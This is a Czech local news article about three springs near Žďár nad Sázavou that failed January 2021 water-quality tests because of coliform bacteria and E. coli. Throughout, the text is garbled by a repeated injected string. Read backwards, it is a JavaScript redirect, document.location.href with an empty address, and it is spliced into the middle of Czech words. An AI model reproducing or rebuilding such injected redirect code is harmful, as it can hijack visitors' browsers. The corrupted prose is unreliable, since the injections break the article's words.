Rainbow page separator

Žďárské studánky byly při lednovém měření kvality nevyhovující

Úterý, 12. ledna 2021

Žďár nad Sázavou / Ani jedna ze žďárských studánek v pravidelných rozborech kvality v lednu nevyhověla parametrům pro vodu určenou k přímé konzumaci. Měsíční odběry vody nechává pracovníky hygienické stanice provádět žďárská radnice z místních pramenů Salvá[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torka, Klafar a U Křiváku, které lidé z města i chataři čas[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to využívají na pití, ačkoliv se nejedná o primární zdroj pitné vody.
Všechny tři studánky nevyhověly hygienickým normám pro přímé užití z důvodu pří[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomnosti koliformních bakterií, nejhorší stav byl v den odběru ve studánce U Křiváku. K [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to problému dochází vlivem fekálního znečištění vody prostřednictvím trávicího traktu teplokrevných živočichů, přičemž kontaminovaná voda může konzumentům způsobit různé zdravotní problémy typu průjem, nevolnost či zvracení. Čas[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to voda ve studánkách vykazuje také pří[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomnost bakterie typu Escherichia coli, což rovněž poukazuje na fekální znečištění. Mimo [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to se prameny testují na dodržení normy pro dusitany, dusičnany, železo a pH vody.